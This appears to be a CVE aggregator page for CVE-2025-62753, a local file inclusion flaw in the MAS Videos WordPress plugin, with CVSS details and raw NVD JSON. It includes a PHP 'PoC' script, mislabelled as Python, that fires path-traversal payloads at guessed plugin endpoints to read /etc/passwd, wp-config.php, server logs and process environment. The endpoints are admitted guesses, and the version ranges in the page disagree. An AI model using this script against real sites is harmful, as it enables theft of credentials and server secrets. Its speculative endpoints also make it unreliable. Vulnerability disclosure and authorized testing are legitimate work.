Security Vulnerability Report
中文
CVE-2025-62753 CVSS 7.5 HIGH

CVE-2025-62753

Published: 2025-12-30 23:15:51
Last Modified: 2026-04-23 15:34:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MadrasThemes MAS Videos masvideos allows PHP Local File Inclusion.This issue affects MAS Videos: from n/a through <= 1.3.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MAS Videos WordPress Plugin <= 1.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-62753 PoC - MAS Videos LFI // Target: WordPress with MAS Videos Plugin <= 1.3.4 $target = "http://target-site.com"; $wp_path = "/wp-content/plugins/masvideos/"; // Vulnerable endpoint example (depends on plugin structure) $vuln_urls = [ $target . $wp_path . "includes/templates/single-video.php?masvideos_video=", $target . $wp_path . "public/class-masvideos-public-ajax.php?action=masvideos_get_video&", $target . $wp_path . "includes/views/masvideos-single-video.php?file=" ]; // LFI payloads $payloads = [ "../../../../../../../../etc/passwd", "../../../../../../../../wp-config.php", "../../../../../../../../../../var/log/apache2/access.log", "../../../../../../../../proc/self/environ" ]; foreach ($vuln_urls as $url) { foreach ($payloads as $payload) { $full_url = $url . urlencode($payload); echo "Testing: " . $full_url . "\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $full_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strpos($response, "root:") !== false) { echo "[+] VULNERABLE! Found sensitive data\n"; } } } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62753", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:50.920", "lastModified": "2026-04-23T15:34:40.667", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MadrasThemes MAS Videos masvideos allows PHP Local File Inclusion.This issue affects MAS Videos: from n/a through <= 1.3.4."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP ('inclusión remota de ficheros PHP') vulnerabilidad en MadrasThemes MAS Videos permite la inclusión local de ficheros PHP. Este problema afecta a MAS Videos: desde n/a hasta 1.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/masvideos/vulnerability/wordpress-mas-videos-plugin-1-3-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}